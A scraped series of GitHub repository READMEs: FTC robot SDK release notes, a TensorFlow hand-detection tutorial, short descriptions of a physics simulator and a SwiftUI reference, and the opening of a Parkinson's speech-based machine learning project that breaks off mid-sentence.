Fixes for Gyro class: Improve (decrease) sensor refresh latency. fix isCalibrating issues. Blocks Programming mode changes: Blocks now ignores a device in the configuration xml if the name is empty. Other devices work in configuration work fine. Version 2.5 (internal release on released on 16.12.13) Blocks Programming mode changes: Added blocks support for AdafruitBNO055IMU. Added Download Op Mode button to FtcBocks.html. Added support for copying blocks in one OpMode and pasting them in an other OpMode. The clipboard content is stored on the phone, so the programming mode server must be running. Modified Utilities section of the toolbox. In Programming Mode, display information about the active connections. Fixed paste location when workspace has been scrolled. Added blocks support for the android Accelerometer. Fixed issue where Blocks Upload Op Mode truncated name at first dot. Added blocks support for Android SoundPool. Added type safety to blocks for Acceleration. Added type safety to blocks for AdafruitBNO055IMU.Parameters. Added type safety to blocks for AnalogInput. Added type safety to blocks for AngularVelocity. Added type safety to blocks for Color. Added type safety to blocks for ColorSensor. Added type safety to blocks for CompassSensor. Added type safety to blocks for CRServo. Added type safety to blocks for DigitalChannel. Added type safety to blocks for ElapsedTime. Added type safety to blocks for Gamepad. Added type safety to blocks for GyroSensor. Added type safety to blocks for IrSeekerSensor. Added type safety to blocks for LED. Added type safety to blocks for LightSensor. Added type safety to blocks for LinearOpMode. Added type safety to blocks for MagneticFlux. Added type safety to blocks for MatrixF. Added type safety to blocks for MrI2cCompassSensor. Added type safety to blocks for MrI2cRangeSensor. Added type safety to blocks for OpticalDistanceSensor. Added type safety to blocks for Orientation. Added type safety to blocks for Position. Added type safety to blocks for Quaternion. Added type safety to blocks for Servo. Added type safety to blocks for ServoController. Added type safety to blocks for Telemetry. Added type safety to blocks for Temperature. Added type safety to blocks for TouchSensor. Added type safety to blocks for UltrasonicSensor. Added type safety to blocks for VectorF. Added type safety to blocks for Velocity. Added type safety to blocks for VoltageSensor. Added type safety to blocks for VuforiaLocalizer.Parameters. Added type safety to blocks for VuforiaTrackable. Added type safety to blocks for VuforiaTrackables. Added type safety to blocks for enums in AdafruitBNO055IMU.Parameters. Added type safety to blocks for AndroidAccelerometer, AndroidGyroscope, AndroidOrientation, and AndroidTextToSpeech. Version 2.4 (released on 16.11.13) Fix to avoid crashing for nonexistent resources. Blocks Programming mode changes: Added blocks to support OpenGLMatrix, MatrixF, and VectorF. Added blocks to support AngleUnit, AxesOrder, AxesReference, CameraDirection, CameraMonitorFeedback, DistanceUnit, and TempUnit. Added blocks to support Acceleration. Added blocks to support LinearOpMode.getRuntime. Added blocks to support MagneticFlux and Position. Fixed typos. Made blocks for ElapsedTime more consistent with other objects. Added blocks to support Quaternion, Velocity, Orientation, AngularVelocity. Added blocks to support VuforiaTrackables, VuforiaTrackable, VuforiaLocalizer, VuforiaTrackableDefaultListener. Fixed a few blocks. Added type checking to new blocks. Updated to latest blockly. Added default variable blocks to navigation and matrix blocks. Fixed toolbox entry for openGLMatrix_rotation_withAxesArgs. When user downloads Blocks-generated op mode, only the .blk file is downloaded. When user uploads Blocks-generated op mode (.blk file), Javascript code is auto generated. Added DbgLog support. Added logging when a blocks file is read/written. Fixed bug to properly render blocks even if missing devices from configuration file. Added support for additional characters (not just alphanumeric) for the block file names (for download and upload). Added support for OpMode flavor (“Autonomous” or “TeleOp”) and group. Changes to Samples to prevent tutorial issues. Incorporated suggested changes from public pull 216 (“Replace .. paths”). Remove Servo Glitches when robot stopped. if user hits “Cancels” when editing a configuration file, clears the unsaved changes and reverts to original unmodified configuration. Added log info to help diagnose why the Robot Controller app was terminated (for example, by watch dog function). Added ability to transfer log from the controller. Fixed inconsistency for AngularVelocity Limit unbounded growth of data for telemetry. If user does not call telemetry.update() for LinearOpMode in a timely manner, data added for telemetry might get lost if size limit is exceeded. Version 2.35 (released on 16.10.06) Blockly programming mode - Removed unnecesary idle() call from blocks for new project. Version 2.30 (released on 16.10.05) Blockly programming mode: Mechanism added to save Blockly op modes from Programming Mode Server onto local device To avoid clutter, blocks are displayed in categorized folders Added support for DigitalChannel Added support for ModernRoboticsI2cCompassSensor Added support for ModernRoboticsI2cRangeSensor Added support for VoltageSensor Added support for AnalogInput Added support for AnalogOutput Fix for CompassSensor setMode block Vuforia Fix deadlock / make camera data available while Vuforia is running. Update to Vuforia 6.0.117 (recommended by Vuforia and Google to close security loophole). Fix for autonomous 30 second timer bug (where timer was in effect, even though it appeared to have timed out). opModeIsActive changes to allow cleanup after op mode is stopped (with enforced 2 second safety timeout). Fix to avoid reading i2c twice. Updated sample Op Modes. Improved logging and fixed intermittent freezing. Added digital I/O sample. Cleaned up device names in sample op modes to be consistent with Pushbot guide. Fix to allow use of IrSeekerSensorV3. Version 2.20 (released on 16.09.08) Support for Modern Robotics Compass Sensor. Support for Modern Robotics Range Sensor. Revise device names for Pushbot templates to match the names used in Pushbot guide. Fixed bug so that IrSeekerSensorV3 device is accessible as IrSeekerSensor in hardwareMap. Modified computer vision code to require an individual Vuforia license (per legal requirement from PTC). Minor fixes. Blockly enhancements: Support for Voltage Sensor. Support for Analog Input. Support for Analog Output. Support for Light Sensor. Support for Servo Controller. Version 2.10 (released on 16.09.03) Support for Adafruit IMU. Improvements to ModernRoboticsI2cGyro class Block on reset of z axis. isCalibrating() returns true while gyro is calibration. Updated sample gyro program. Blockly enhancements support for android.graphics.Color. added support for ElapsedTime. improved look and legibility of blocks. support for compass sensor. support for ultrasonic sensor. support for IrSeeker. support for LED. support for color sensor. support for CRServo prompt user to configure robot before using programming mode. Provides ability to disable audio cues. various bug fixes and improvements. Version 2.00 (released on 16.08.19) This is the new release for the upcoming 2016-2017 FIRST Tech Challenge Season. Channel change is enabled in the FTC Robot Controller app for Moto G 2nd and 3rd Gen phones. Users can now use annotations to register/disable their Op Modes. Changes in the Android SDK, JDK and build tool requirements (minsdk=19, java 1.7, build tools 23.0.3). Standardized units in analog input. Cleaned up code for existing analog sensor classes. setChannelMode and getChannelMode were REMOVED from the DcMotorController class. This is important - we no longer set the motor modes through the motor controller. setMode and getMode were added to the DcMotor class. ContinuousRotationServo class has been added to the FTC SDK. Range.clip() method has been overloaded so it can support this operation for int, short and byte integers. Some changes have been made (new methods added) on how a user can access items from the hardware map. Users can now set the zero power behavior for a DC motor so that the motor will brake or float when power is zero. Prototype Blockly Programming Mode has been added to FTC Robot Controller. Users can place the Robot Controller into this mode, and then use a device (such as a laptop) that has a Javascript enabled browser to write Blockly-based Op Modes directly onto the Robot Controller. Users can now configure the robot remotely through the FTC Driver Station app. Android Studio project supports Android Studio 2.1.x and compile SDK Version 23 (Marshmallow). Vuforia Computer Vision SDK integrated into FTC SDK. Users can use sample vision targets to get localization information on a standard FTC field. Project structure has been reorganized so that there is now a TeamCode package that users can use to place their local/custom Op Modes into this package. Inspection function has been integrated into the FTC Robot Controller and Driver Station Apps (Thanks Team HazMat… 9277 & 10650!). Audio cues have been incorporated into FTC SDK. Swap mechanism added to FTC Robot Controller configuration activity. For example, if you have two motor controllers on a robot, and you misidentified them in your configuration file, you can use the Swap button to swap the devices within the configuration file (so you do not have to manually re-enter in the configuration info for the two devices). Fix mechanism added to all user to replace an electronic module easily. For example, suppose a servo controller dies on your robot. You replace the broken module with a new module, which has a different serial number from the original servo controller. You can use the Fix button to automatically reconfigure your configuration file to use the serial number of the new module. Improvements made to fix resiliency and responsiveness of the system. For LinearOpMode the user now must for a telemetry.update() to update the telemetry data on the driver station. This update() mechanism ensures that the driver station gets the updated data properly and at the same time. The Auto Configure function of the Robot Controller is now template based. If there is a commonly used robot configuration, a template can be created so that the Auto Configure mechanism can be used to quickly configure a robot of this type. The logic to detect a runaway op mode (both in the LinearOpMode and OpMode types) and to abort the run, then auto recover has been improved/implemented. Fix has been incorporated so that Logitech F310 gamepad mappings will be correct for Marshmallow users. Release 16.07.08 For the ftc_app project, the gradle files have been modified to support Android Studio 2.1.x. Release 16.03.30 For the MIT App Inventor, the design blocks have new icons that better represent the function of each design component. Some changes were made to the shutdown logic to ensure the robust shutdown of some of our USB services. A change was made to LinearOpMode so as to allow a given instance to be executed more than once, which is required for the App Inventor. Javadoc improved/updated. Release 16.03.09 Changes made to make the FTC SDK synchronous (significant change!) waitOneFullHardwareCycle() and waitForNextHardwareCycle() are no longer needed and have been deprecated. runOpMode() (for a LinearOpMode) is now decoupled from the system's hardware read/write thread. loop() (for an OpMode) is now decoupled from the system's hardware read/write thread. Methods are synchronous. For example, if you call setMode(DcMotorController.RunMode.RESET_ENCODERS) for a motor, the encoder is guaranteed to be reset when the method call is complete. For legacy module (NXT compatible), user no longer has to toggle between read and write modes when reading from or writing to a legacy device. Changes made to enhance reliability/robustness during ESD event. Changes made to make code thread safe. Debug keystore added so that user-generated robot controller APKs will all use the same signed key (to avoid conflicts if a team has multiple developer laptops for example). Firmware version information for Modern Robotics modules are now logged. Changes made to improve USB comm reliability and robustness. Added support for voltage indicator for legacy (NXT-compatible) motor controllers. Changes made to provide auto stop capabilities for op modes. A LinearOpMode class will stop when the statements in runOpMode() are complete. User does not have to push the stop button on the driver station. If an op mode is stopped by the driver station, but there is a run away/uninterruptible thread persisting, the app will log an error message then force itself to crash to stop the runaway thread. Driver Station UI modified to display lowest measured voltage below current voltage (12V battery). Driver Station UI modified to have color background for current voltage (green=good, yellow=caution, red=danger, extremely low voltage). javadoc improved (edits and additional classes). Added app build time to About activity for driver station and robot controller apps. Display local IP addresses on Driver Station About activity. Added I2cDeviceSynchImpl. Added I2cDeviceSync interface. Added seconds() and milliseconds() to ElapsedTime for clarity. Added getCallbackCount() to I2cDevice. Added missing clearI2cPortActionFlag. Added code to create log messages while waiting for LinearOpMode shutdown. Fix so Wifi Direct Config activity will no longer launch multiple times. Added the ability to specify an alternate i2c address in software for the Modern Robotics gyro. Release 16.02.09 Improved battery checker feature so that voltage values get refreshed regularly (every 250 msec) on Driver Station (DS) user interface. Improved software so that Robot Controller (RC) is much more resilient and “self-healing” to USB disconnects: If user attempts to start/restart RC with one or more module missing, it will display a warning but still start up. When running an op mode, if one or more modules gets disconnected, the RC & DS will display warnings,and robot will keep on working in spite of the missing module(s). If a disconnected module gets physically reconnected the RC will auto detect the module and the user will regain control of the recently connected module. Warning messages are more helpful (identifies the type of module that’s missing plus its USB serial number). Code changes to fix the null gamepad reference when users try to reference the gamepads in the init() portion of their op mode. NXT light sensor output is now properly scaled. Note that teams might have to readjust their light threshold values in their op modes. On DS user interface, gamepad icon for a driver will disappear if the matching gamepad is disconnected or if that gamepad gets designated as a different driver. Robot Protocol (ROBOCOL) version number info is displayed in About screen on RC and DS apps. Incorporated a display filter on pairing screen to filter out devices that don’t use the “-“ format. This filter can be turned off to show all WiFi Direct devices. Updated text in License file. Fixed formatting error in OpticalDistanceSensor.toString(). Fixed issue on with a blank (“”) device name that would disrupt WiFi Direct Pairing. Made a change so that the WiFi info and battery info can be displayed more quickly on the DS upon connecting to RC. Improved javadoc generation. Modified code to make it easier to support language localization in the future. Release 16.01.04 Updated compileSdkVersion for apps Prevent Wifi from entering power saving mode removed unused import from driver station Corrrected "Dead zone" joystick code. LED.getDeviceName and .getConnectionInfo() return null apps check for ROBOCOL_VERSION mismatch Fix for Telemetry also has off-by-one errors in its data string sizing / short size limitations error User telemetry output is sorted. added formatting variants to DbgLog and RobotLog APIs code modified to allow for a long list of op mode names. changes to improve thread safety of RobocolDatagramSocket Fix for "missing hardware leaves robot controller disconnected from driver station" error fix for "fast tapping of Init/Start causes problems" (toast is now only instantiated on UI thread). added some log statements for thread life cycle. moved gamepad reset logic inside of initActiveOpMode() for robustness changes made to mitigate risk of race conditions on public methods. changes to try and flag when WiFi Direct name contains non-printable characters. fix to correct race condition between .run() and .close() in ReadWriteRunnableStandard. updated FTDI driver made ReadWriteRunnableStanard interface public. fixed off-by-one errors in Command constructor moved specific hardware implmentations into their own package. moved specific gamepad implemnatations to the hardware library. changed LICENSE file to new BSD version. fixed race condition when shutting down Modern Robotics USB devices. methods in the ColorSensor classes have been synchronized. corrected isBusy() status to reflect end of motion. corrected "back" button keycode. the notSupported() method of the GyroSensor class was changed to protected (it should not be public). Release 15.11.04.001 Added Support for Modern Robotics Gyro. The GyroSensor class now supports the MR Gyro Sensor. Users can access heading data (about Z axis) Users can also access raw gyro data (X, Y, & Z axes). Example MRGyroTest.java op mode included. Improved error messages More descriptive error messages for exceptions in user code. Updated DcMotor API Enable read mode on new address in setI2cAddress Fix so that driver station app resets the gamepads when switching op modes. USB-related code changes to make USB comm more responsive and to display more explicit error messages. Fix so that USB will recover properly if the USB bus returns garbage data. Fix USB initializtion race condition. Better error reporting during FTDI open. More explicit messages during USB failures. Fixed bug so that USB device is closed if event loop teardown method was not called. Fixed timer UI issue Fixed duplicate name UI bug (Legacy Module configuration). Fixed race condition in EventLoopManager. Fix to keep references stable when updating gamepad. For legacy Matrix motor/servo controllers removed necessity of appending "Motor" and "Servo" to controller names. Updated HT color sensor driver to use constants from ModernRoboticsUsbLegacyModule class. Updated MR color sensor driver to use constants from ModernRoboticsUsbDeviceInterfaceModule class. Correctly handle I2C Address change in all color sensors Updated/cleaned up op modes. Updated comments in LinearI2cAddressChange.java example op mode. Replaced the calls to "setChannelMode" with "setMode" (to match the new of the DcMotor method). Removed K9AutoTime.java op mode. Added MRGyroTest.java op mode (demonstrates how to use MR Gyro Sensor). Added MRRGBExample.java op mode (demonstrates how to use MR Color Sensor). Added HTRGBExample.java op mode (demonstrates how to use HT legacy color sensor). Added MatrixControllerDemo.java (demonstrates how to use legacy Matrix controller). Updated javadoc documentation. Updated release .apk files for Robot Controller and Driver Station apps. Release 15.10.06.002 Added support for Legacy Matrix 9.6V motor/servo controller. Cleaned up build.gradle file. Minor UI and bug fixes for driver station and robot controller apps. Throws error if Ultrasonic sensor (NXT) is not configured for legacy module port 4 or 5. Release 15.08.03.001 New user interfaces for FTC Driver Station and FTC Robot Controller apps. An init() method is added to the OpMode class. For this release, init() is triggered right before the start() method. Eventually, the init() method will be triggered when the user presses an "INIT" button on driver station. The init() and loop() methods are now required (i.e., need to be overridden in the user's op mode). The start() and stop() methods are optional. A new LinearOpMode class is introduced. Teams can use the LinearOpMode mode to create a linear (not event driven) program model. Teams can use blocking statements like Thread.sleep() within a linear op mode. The API for the Legacy Module and Core Device Interface Module have been updated. Support for encoders with the Legacy Module is now working. The hardware loop has been updated for better performance.
molyswu / Hand Detectionusing Neural Networks (SSD) on Tensorflow. This repo documents steps and scripts used to train a hand detector using Tensorflow (Object Detection API). As with any DNN based task, the most expensive (and riskiest) part of the process has to do with finding or creating the right (annotated) dataset. I was interested mainly in detecting hands on a table (egocentric view point). I experimented first with the [Oxford Hands Dataset](http://www.robots.ox.ac.uk/~vgg/data/hands/) (the results were not good). I then tried the [Egohands Dataset](http://vision.soic.indiana.edu/projects/egohands/) which was a much better fit to my requirements. The goal of this repo/post is to demonstrate how neural networks can be applied to the (hard) problem of tracking hands (egocentric and other views). Better still, provide code that can be adapted to other uses cases. If you use this tutorial or models in your research or project, please cite [this](#citing-this-tutorial). Here is the detector in action. <img src="images/hand1.gif" width="33.3%"><img src="images/hand2.gif" width="33.3%"><img src="images/hand3.gif" width="33.3%"> Realtime detection on video stream from a webcam . <img src="images/chess1.gif" width="33.3%"><img src="images/chess2.gif" width="33.3%"><img src="images/chess3.gif" width="33.3%"> Detection on a Youtube video. Both examples above were run on a macbook pro **CPU** (i7, 2.5GHz, 16GB). Some fps numbers are: | FPS | Image Size | Device| Comments| | ------------- | ------------- | ------------- | ------------- | | 21 | 320 * 240 | Macbook pro (i7, 2.5GHz, 16GB) | Run without visualizing results| | 16 | 320 * 240 | Macbook pro (i7, 2.5GHz, 16GB) | Run while visualizing results (image above) | | 11 | 640 * 480 | Macbook pro (i7, 2.5GHz, 16GB) | Run while visualizing results (image above) | > Note: The code in this repo is written and tested with Tensorflow `1.4.0-rc0`. Using a different version may result in [some errors](https://github.com/tensorflow/models/issues/1581). You may need to [generate your own frozen model](https://pythonprogramming.net/testing-custom-object-detector-tensorflow-object-detection-api-tutorial/?completed=/training-custom-objects-tensorflow-object-detection-api-tutorial/) graph using the [model checkpoints](model-checkpoint) in the repo to fit your TF version. **Content of this document** - Motivation - Why Track/Detect hands with Neural Networks - Data preparation and network training in Tensorflow (Dataset, Import, Training) - Training the hand detection Model - Using the Detector to Detect/Track hands - Thoughts on Optimizations. > P.S if you are using or have used the models provided here, feel free to reach out on twitter ([@vykthur](https://twitter.com/vykthur)) and share your work! ## Motivation - Why Track/Detect hands with Neural Networks? There are several existing approaches to tracking hands in the computer vision domain. Incidentally, many of these approaches are rule based (e.g extracting background based on texture and boundary features, distinguishing between hands and background using color histograms and HOG classifiers,) making them not very robust. For example, these algorithms might get confused if the background is unusual or in situations where sharp changes in lighting conditions cause sharp changes in skin color or the tracked object becomes occluded.(see [here for a review](https://www.cse.unr.edu/~bebis/handposerev.pdf) paper on hand pose estimation from the HCI perspective) With sufficiently large datasets, neural networks provide opportunity to train models that perform well and address challenges of existing object tracking/detection algorithms - varied/poor lighting, noisy environments, diverse viewpoints and even occlusion. The main drawbacks to usage for real-time tracking/detection is that they can be complex, are relatively slow compared to tracking-only algorithms and it can be quite expensive to assemble a good dataset. But things are changing with advances in fast neural networks. Furthermore, this entire area of work has been made more approachable by deep learning frameworks (such as the tensorflow object detection api) that simplify the process of training a model for custom object detection. More importantly, the advent of fast neural network models like ssd, faster r-cnn, rfcn (see [here](https://github.com/tensorflow/models/blob/master/research/object_detection/g3doc/detection_model_zoo.md#coco-trained-models-coco-models) ) etc make neural networks an attractive candidate for real-time detection (and tracking) applications. Hopefully, this repo demonstrates this. > If you are not interested in the process of training the detector, you can skip straight to applying the [pretrained model I provide in detecting hands](#detecting-hands). Training a model is a multi-stage process (assembling dataset, cleaning, splitting into training/test partitions and generating an inference graph). While I lightly touch on the details of these parts, there are a few other tutorials cover training a custom object detector using the tensorflow object detection api in more detail[ see [here](https://pythonprogramming.net/training-custom-objects-tensorflow-object-detection-api-tutorial/) and [here](https://towardsdatascience.com/how-to-train-your-own-object-detector-with-tensorflows-object-detector-api-bec72ecfe1d9) ]. I recommend you walk through those if interested in training a custom object detector from scratch. ## Data preparation and network training in Tensorflow (Dataset, Import, Training) **The Egohands Dataset** The hand detector model is built using data from the [Egohands Dataset](http://vision.soic.indiana.edu/projects/egohands/) dataset. This dataset works well for several reasons. It contains high quality, pixel level annotations (>15000 ground truth labels) where hands are located across 4800 images. All images are captured from an egocentric view (Google glass) across 48 different environments (indoor, outdoor) and activities (playing cards, chess, jenga, solving puzzles etc). <img src="images/egohandstrain.jpg" width="100%"> If you will be using the Egohands dataset, you can cite them as follows: > Bambach, Sven, et al. "Lending a hand: Detecting hands and recognizing activities in complex egocentric interactions." Proceedings of the IEEE International Conference on Computer Vision. 2015. The Egohands dataset (zip file with labelled data) contains 48 folders of locations where video data was collected (100 images per folder). ``` -- LOCATION_X -- frame_1.jpg -- frame_2.jpg ... -- frame_100.jpg -- polygons.mat // contains annotations for all 100 images in current folder -- LOCATION_Y -- frame_1.jpg -- frame_2.jpg ... -- frame_100.jpg -- polygons.mat // contains annotations for all 100 images in current folder ``` **Converting data to Tensorflow Format** Some initial work needs to be done to the Egohands dataset to transform it into the format (`tfrecord`) which Tensorflow needs to train a model. This repo contains `egohands_dataset_clean.py` a script that will help you generate these csv files. - Downloads the egohands datasets - Renames all files to include their directory names to ensure each filename is unique - Splits the dataset into train (80%), test (10%) and eval (10%) folders. - Reads in `polygons.mat` for each folder, generates bounding boxes and visualizes them to ensure correctness (see image above). - Once the script is done running, you should have an images folder containing three folders - train, test and eval. Each of these folders should also contain a csv label document each - `train_labels.csv`, `test_labels.csv` that can be used to generate `tfrecords` Note: While the egohands dataset provides four separate labels for hands (own left, own right, other left, and other right), for my purpose, I am only interested in the general `hand` class and label all training data as `hand`. You can modify the data prep script to generate `tfrecords` that support 4 labels. Next: convert your dataset + csv files to tfrecords. A helpful guide on this can be found [here](https://pythonprogramming.net/creating-tfrecord-files-tensorflow-object-detection-api-tutorial/).For each folder, you should be able to generate `train.record`, `test.record` required in the training process. ## Training the hand detection Model Now that the dataset has been assembled (and your tfrecords), the next task is to train a model based on this. With neural networks, it is possible to use a process called [transfer learning](https://www.tensorflow.org/tutorials/image_retraining) to shorten the amount of time needed to train the entire model. This means we can take an existing model (that has been trained well on a related domain (here image classification) and retrain its final layer(s) to detect hands for us. Sweet!. Given that neural networks sometimes have thousands or millions of parameters that can take weeks or months to train, transfer learning helps shorten training time to possibly hours. Tensorflow does offer a few models (in the tensorflow [model zoo](https://github.com/tensorflow/models/blob/master/research/object_detection/g3doc/detection_model_zoo.md#coco-trained-models-coco-models)) and I chose to use the `ssd_mobilenet_v1_coco` model as my start point given it is currently (one of) the fastest models (read the SSD research [paper here](https://arxiv.org/pdf/1512.02325.pdf)). The training process can be done locally on your CPU machine which may take a while or better on a (cloud) GPU machine (which is what I did). For reference, training on my macbook pro (tensorflow compiled from source to take advantage of the mac's cpu architecture) the maximum speed I got was 5 seconds per step as opposed to the ~0.5 seconds per step I got with a GPU. For reference it would take about 12 days to run 200k steps on my mac (i7, 2.5GHz, 16GB) compared to ~5hrs on a GPU. > **Training on your own images**: Please use the [guide provided by Harrison from pythonprogramming](https://pythonprogramming.net/training-custom-objects-tensorflow-object-detection-api-tutorial/) on how to generate tfrecords given your label csv files and your images. The guide also covers how to start the training process if training locally. [see [here] (https://pythonprogramming.net/training-custom-objects-tensorflow-object-detection-api-tutorial/)]. If training in the cloud using a service like GCP, see the [guide here](https://github.com/tensorflow/models/blob/master/research/object_detection/g3doc/running_on_cloud.md). As the training process progresses, the expectation is that total loss (errors) gets reduced to its possible minimum (about a value of 1 or thereabout). By observing the tensorboard graphs for total loss(see image below), it should be possible to get an idea of when the training process is complete (total loss does not decrease with further iterations/steps). I ran my training job for 200k steps (took about 5 hours) and stopped at a total Loss (errors) value of 2.575.(In retrospect, I could have stopped the training at about 50k steps and gotten a similar total loss value). With tensorflow, you can also run an evaluation concurrently that assesses your model to see how well it performs on the test data. A commonly used metric for performance is mean average precision (mAP) which is single number used to summarize the area under the precision-recall curve. mAP is a measure of how well the model generates a bounding box that has at least a 50% overlap with the ground truth bounding box in our test dataset. For the hand detector trained here, the mAP value was **0.9686@0.5IOU**. mAP values range from 0-1, the higher the better. <img src="images/accuracy.jpg" width="100%"> Once training is completed, the trained inference graph (`frozen_inference_graph.pb`) is then exported (see the earlier referenced guides for how to do this) and saved in the `hand_inference_graph` folder. Now its time to do some interesting detection. ## Using the Detector to Detect/Track hands If you have not done this yet, please following the guide on installing [Tensorflow and the Tensorflow object detection api](https://github.com/tensorflow/models/blob/master/research/object_detection/g3doc/installation.md). This will walk you through setting up the tensorflow framework, cloning the tensorflow github repo and a guide on - Load the `frozen_inference_graph.pb` trained on the hands dataset as well as the corresponding label map. In this repo, this is done in the `utils/detector_utils.py` script by the `load_inference_graph` method. ```python detection_graph = tf.Graph() with detection_graph.as_default(): od_graph_def = tf.GraphDef() with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid: serialized_graph = fid.read() od_graph_def.ParseFromString(serialized_graph) tf.import_graph_def(od_graph_def, name='') sess = tf.Session(graph=detection_graph) print("> ====== Hand Inference graph loaded.") ``` - Detect hands. In this repo, this is done in the `utils/detector_utils.py` script by the `detect_objects` method. ```python (boxes, scores, classes, num) = sess.run( [detection_boxes, detection_scores, detection_classes, num_detections], feed_dict={image_tensor: image_np_expanded}) ``` - Visualize detected bounding detection_boxes. In this repo, this is done in the `utils/detector_utils.py` script by the `draw_box_on_image` method. This repo contains two scripts that tie all these steps together. - detect_multi_threaded.py : A threaded implementation for reading camera video input detection and detecting. Takes a set of command line flags to set parameters such as `--display` (visualize detections), image parameters `--width` and `--height`, videe `--source` (0 for camera) etc. - detect_single_threaded.py : Same as above, but single threaded. This script works for video files by setting the video source parameter videe `--source` (path to a video file). ```cmd # load and run detection on video at path "videos/chess.mov" python detect_single_threaded.py --source videos/chess.mov ``` > Update: If you do have errors loading the frozen inference graph in this repo, feel free to generate a new graph that fits your TF version from the model-checkpoint in this repo. Use the [export_inference_graph.py](https://github.com/tensorflow/models/blob/master/research/object_detection/export_inference_graph.py) script provided in the tensorflow object detection api repo. More guidance on this [here](https://pythonprogramming.net/testing-custom-object-detector-tensorflow-object-detection-api-tutorial/?completed=/training-custom-objects-tensorflow-object-detection-api-tutorial/). ## Thoughts on Optimization. A few things that led to noticeable performance increases. - Threading: Turns out that reading images from a webcam is a heavy I/O event and if run on the main application thread can slow down the program. I implemented some good ideas from [Adrian Rosebuck](https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/) on parrallelizing image capture across multiple worker threads. This mostly led to an FPS increase of about 5 points. - For those new to Opencv, images from the `cv2.read()` method return images in [BGR format](https://www.learnopencv.com/why-does-opencv-use-bgr-color-format/). Ensure you convert to RGB before detection (accuracy will be much reduced if you dont). ```python cv2.cvtColor(image_np, cv2.COLOR_BGR2RGB) ``` - Keeping your input image small will increase fps without any significant accuracy drop.(I used about 320 x 240 compared to the 1280 x 720 which my webcam provides). - Model Quantization. Moving from the current 32 bit to 8 bit can achieve up to 4x reduction in memory required to load and store models. One way to further speed up this model is to explore the use of [8-bit fixed point quantization](https://heartbeat.fritz.ai/8-bit-quantization-and-tensorflow-lite-speeding-up-mobile-inference-with-low-precision-a882dfcafbbd). Performance can also be increased by a clever combination of tracking algorithms with the already decent detection and this is something I am still experimenting with. Have ideas for optimizing better, please share! <img src="images/general.jpg" width="100%"> Note: The detector does reflect some limitations associated with the training set. This includes non-egocentric viewpoints, very noisy backgrounds (e.g in a sea of hands) and sometimes skin tone. There is opportunity to improve these with additional data. ## Integrating Multiple DNNs. One way to make things more interesting is to integrate our new knowledge of where "hands" are with other detectors trained to recognize other objects. Unfortunately, while our hand detector can in fact detect hands, it cannot detect other objects (a factor or how it is trained). To create a detector that classifies multiple different objects would mean a long involved process of assembling datasets for each class and a lengthy training process. > Given the above, a potential strategy is to explore structures that allow us **efficiently** interleave output form multiple pretrained models for various object classes and have them detect multiple objects on a single image. An example of this is with my primary use case where I am interested in understanding the position of objects on a table with respect to hands on same table. I am currently doing some work on a threaded application that loads multiple detectors and outputs bounding boxes on a single image. More on this soon.
penn-graphics-research / Ziran2019Visco-elasto-plasticity and fracture simulator with the material point method (MPM) -- the reference implementation of SIGGRAPH 2019 technical paper Silly Rubber and CD-MPM.
conorluddy / LiquidGlassReferenceiOS 26 Liquid Glass: Ultimate Swift/SwiftUI Reference. This is really just a document I can point Claude at when I want to make glass. conor.fyi/writing/liquid-glass-reference
Aastha2104 / Parkinson Disease PredictionIntroduction Parkinson’s Disease is the second most prevalent neurodegenerative disorder after Alzheimer’s, affecting more than 10 million people worldwide. Parkinson’s is characterized primarily by the deterioration of motor and cognitive ability. There is no single test which can be administered for diagnosis. Instead, doctors must perform a careful clinical analysis of the patient’s medical history. Unfortunately, this method of diagnosis is highly inaccurate. A study from the National Institute of Neurological Disorders finds that early diagnosis (having symptoms for 5 years or less) is only 53% accurate. This is not much better than random guessing, but an early diagnosis is critical to effective treatment. Because of these difficulties, I investigate a machine learning approach to accurately diagnose Parkinson’s, using a dataset of various speech features (a non-invasive yet characteristic tool) from the University of Oxford. Why speech features? Speech is very predictive and characteristic of Parkinson’s disease; almost every Parkinson’s patient experiences severe vocal degradation (inability to produce sustained phonations, tremor, hoarseness), so it makes sense to use voice to diagnose the disease. Voice analysis gives the added benefit of being non-invasive, inexpensive, and very easy to extract clinically. Background Parkinson's Disease Parkinson’s is a progressive neurodegenerative condition resulting from the death of the dopamine containing cells of the substantia nigra (which plays an important role in movement). Symptoms include: “frozen” facial features, bradykinesia (slowness of movement), akinesia (impairment of voluntary movement), tremor, and voice impairment. Typically, by the time the disease is diagnosed, 60% of nigrostriatal neurons have degenerated, and 80% of striatal dopamine have been depleted. Performance Metrics TP = true positive, FP = false positive, TN = true negative, FN = false negative Accuracy: (TP+TN)/(P+N) Matthews Correlation Coefficient: 1=perfect, 0=random, -1=completely inaccurate Algorithms Employed Logistic Regression (LR): Uses the sigmoid logistic equation with weights (coefficient values) and biases (constants) to model the probability of a certain class for binary classification. An output of 1 represents one class, and an output of 0 represents the other. Training the model will learn the optimal weights and biases. Linear Discriminant Analysis (LDA): Assumes that the data is Gaussian and each feature has the same variance. LDA estimates the mean and variance for each class from the training data, and then uses properties of statistics (Bayes theorem , Gaussian distribution, etc) to compute the probability of a particular instance belonging to a given class. The class with the largest probability is the prediction. k Nearest Neighbors (KNN): Makes predictions about the validation set using the entire training set. KNN makes a prediction about a new instance by searching through the entire set to find the k “closest” instances. “Closeness” is determined using a proximity measurement (Euclidean) across all features. The class that the majority of the k closest instances belong to is the class that the model predicts the new instance to be. Decision Tree (DT): Represented by a binary tree, where each root node represents an input variable and a split point, and each leaf node contains an output used to make a prediction. Neural Network (NN): Models the way the human brain makes decisions. Each neuron takes in 1+ inputs, and then uses an activation function to process the input with weights and biases to produce an output. Neurons can be arranged into layers, and multiple layers can form a network to model complex decisions. Training the network involves using the training instances to optimize the weights and biases. Naive Bayes (NB): Simplifies the calculation of probabilities by assuming that all features are independent of one another (a strong but effective assumption). Employs Bayes Theorem to calculate the probabilities that the instance to be predicted is in each class, then finds the class with the highest probability. Gradient Boost (GB): Generally used when seeking a model with very high predictive performance. Used to reduce bias and variance (“error”) by combining multiple “weak learners” (not very good models) to create a “strong learner” (high performance model). Involves 3 elements: a loss function (error function) to be optimized, a weak learner (decision tree) to make predictions, and an additive model to add trees to minimize the loss function. Gradient descent is used to minimize error after adding each tree (one by one). Engineering Goal Produce a machine learning model to diagnose Parkinson’s disease given various features of a patient’s speech with at least 90% accuracy and/or a Matthews Correlation Coefficient of at least 0.9. Compare various algorithms and parameters to determine the best model for predicting Parkinson’s. Dataset Description Source: the University of Oxford 195 instances (147 subjects with 